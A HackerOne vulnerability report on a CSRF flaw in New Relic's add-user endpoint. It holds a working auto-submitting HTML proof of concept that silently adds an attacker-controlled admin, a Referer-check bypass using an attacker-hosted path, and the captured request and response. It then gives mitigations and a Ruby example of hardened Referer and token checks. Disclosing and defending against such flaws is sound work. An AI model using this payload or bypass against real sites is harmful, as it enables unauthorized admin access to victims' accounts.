New Relic: CSRF For Adding Users

2017-05-01T15:54:48
ID H1:225326
Type hackerone
Reporter atestpk
Modified 2017-10-11T22:54:42

Description

Issue: The affected endpoint is https://rpm.newrelic.com/accounts/{{accountid}}/account_views.

Only admin users are allowed to add new users to an account, but a normal user who knows the accountid can craft a webpage that performs a CSRF against this endpoint when an admin user visits it.

Two problems together make the CSRF possible:

1. The authenticity_token is not checked (the request body carries none at all).
2. There is a Referer header check, but it is flawed: a Referer URL that merely contains rpm.newrelic.com anywhere in it passes, so a page hosted at http://attacker.com/rpm.newrelic.com/ bypasses the check.

PoC (replace accountid with the target account id, and host the page at a URL whose path contains rpm.newrelic.com so that the Referer passes the flawed check):

```html
<html>
<body>
<!-- Hidden frame: the POST response is rendered here, so the victim sees nothing -->
<iframe style="width:0;height:0;border:0; border:none;" name="csrf-frame"></iframe>

<!-- Same field names the legitimate add-user form submits; no authenticity_token needed -->
<form name="adduser" action="https://rpm.newrelic.com/accounts/accountid/account_views" method="post" target="csrf-frame">
  <input type="submit">
  <input type="hidden" name="utf8" value="✓">
  <input type="hidden" name="id" value="accountid">
  <input type="hidden" name="account_view[user][email]" value="attacker@gmail.com">
  <input type="hidden" name="account_view[user][full_name]" value="attacker">
  <input type="hidden" name="account_view[level]" value="admin">
  <input type="hidden" name="account_view[user][job_title]" value="">
</form>

<script>
  // Submit automatically on page load; the victim does not have to click anything
  document.forms.adduser.submit();
</script>
</body>
</html>
```

An admin who visits this page while logged in will add attacker@gmail.com as an admin user to the account.

CSRF request and response:

```http
POST /accounts/1621740/account_views HTTP/1.1
Host: rpm.newrelic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 196
Referer: http://redirectxss.herokuapp.com/rpm.newrelic.com/csrftest
[.......]

utf8=%E2%9C%93&id=1621740&account_view%5Buser%5D%5Bemail%5D=attacker%40gmail.com&account_view%5Buser%5D%5Bfull_name%5D=attacker&account_view%5Blevel%5D=admin&account_view%5Buser%5D%5Bjob_title%5D=
```

==>

```http
HTTP/1.1 302 Found
Server: nginx
Date: Mon, 01 May 2017 15:48:12 GMT
Content-Type: text/html; charset=utf-8
Connection: Keep-Alive
Status: 302 Found
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Location: https://rpm.newrelic.com/accounts/1621740
[.....]

<html><body>You are being <a href="https://rpm.newrelic.com/accounts/1621740">redirected</a>.</body></html>
```

The POST request above was accepted: the server answered 302 Found and redirected to https://rpm.newrelic.com/accounts/1621740 although the body contains no authenticity_token and the Referer is on an attacker-controlled host. Note that the X-Frame-Options: DENY header on the response does not help here; it only stops the browser from rendering the redirect target inside the hidden iframe, after the server has already processed the request.

Mitigation:

1. Verify the CSRF token (authenticity_token) on every state-changing request; this is the primary fix.
2. If a Referer check is kept as defence in depth, parse the Referer as a URL and compare its host exactly against rpm.newrelic.com (or a whitelist of domains) instead of looking for the string anywhere in the URL. A plain "starts with rpm.newrelic.com" string test is not enough either, since rpm.newrelic.com.attacker.com would still pass.
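The following is an added example, not code from the report or from New Relic, that puts the two flaws and the two mitigations side by side: a substring-style Referer check reconstructed from the bypass described above (assumed behaviour; the real implementation is not on the page), a hardened host-exact Referer check, and a constant-time anti-CSRF token comparison in the style of a Rails authenticity_token. The helper names, the session and params hashes, and the sample Referer values other than the one in the captured request are constructed for the example.

```ruby
require 'uri'

ALLOWED_HOSTS = %w[rpm.newrelic.com].freeze

# Flawed check as implied by the bypass: any Referer containing the string
# "rpm.newrelic.com" anywhere (scheme, host, path, query) is accepted.
# Reconstructed for illustration; the real check is not shown on the page.
def referer_allowed_naive?(referer)
  return false if referer.nil?
  referer.include?('rpm.newrelic.com')
end

# Hardened check: parse the header as a URL, require https, and compare the
# host exactly (case-insensitive) against an allowlist. A missing, empty or
# unparseable Referer is rejected, and so is rpm.newrelic.com.attacker.com.
def referer_allowed?(referer, allowed_hosts: ALLOWED_HOSTS)
  return false if referer.nil? || referer.empty?
  uri = URI.parse(referer)
  return false unless uri.is_a?(URI::HTTPS) && uri.host
  allowed_hosts.include?(uri.host.downcase)
rescue URI::InvalidURIError
  false
end

# Constant-time byte comparison so the token check leaks no timing signal.
def secure_compare(a, b)
  return false unless a.bytesize == b.bytesize
  diff = 0
  a.bytes.zip(b.bytes) { |x, y| diff |= x ^ y }
  diff.zero?
end

# Rails-style per-session token: the value submitted in the form must equal
# the one stored in the server-side session. An absent token fails closed.
def csrf_token_valid?(session_token, submitted_token)
  return false if session_token.nil? || submitted_token.nil?
  secure_compare(session_token, submitted_token)
end

# Decision the server should make for a state-changing request: safe methods
# pass, everything else needs BOTH a valid token and an acceptable Referer.
def request_verified?(method:, params:, session:, referer:)
  return true if %w[GET HEAD OPTIONS].include?(method.upcase)
  csrf_token_valid?(session[:csrf_token], params['authenticity_token']) &&
    referer_allowed?(referer)
end

# Constructed request shaped like the captured CSRF POST: the add-user fields
# are present, no authenticity_token, Referer on the attacker's host with
# "rpm.newrelic.com" in the path.
CSRF_PARAMS = {
  'utf8' => '✓',
  'id' => '1621740',
  'account_view' => {
    'user' => { 'email' => 'attacker@gmail.com', 'full_name' => 'attacker', 'job_title' => '' },
    'level' => 'admin'
  }
}.freeze
CSRF_REFERER = 'http://redirectxss.herokuapp.com/rpm.newrelic.com/csrftest'.freeze
SESSION = { csrf_token: 'Zy3XhR8mC4pQv1Ln' }.freeze   # constructed session token

if $PROGRAM_NAME == __FILE__
  puts "naive referer check accepts attacker page: #{referer_allowed_naive?(CSRF_REFERER)}"
  puts "hardened referer check accepts attacker page: #{referer_allowed?(CSRF_REFERER)}"
  puts "CSRF POST verified: #{request_verified?(method: 'POST', params: CSRF_PARAMS,
                                                 session: SESSION, referer: CSRF_REFERER)}"
  legit = CSRF_PARAMS.merge('authenticity_token' => SESSION[:csrf_token])
  puts "legitimate POST verified: #{request_verified?(method: 'POST', params: legit,
                                                       session: SESSION,
                                                       referer: 'https://rpm.newrelic.com/accounts/1621740')}"
end
```

Running the script shows the captured CSRF request passing the naive Referer test and being rejected by the hardened one, while a request carrying the session's token from a page on rpm.newrelic.com is accepted. The token check is what actually stops the attack; the Referer check only backs it up, which is why request_verified? requires both rather than either.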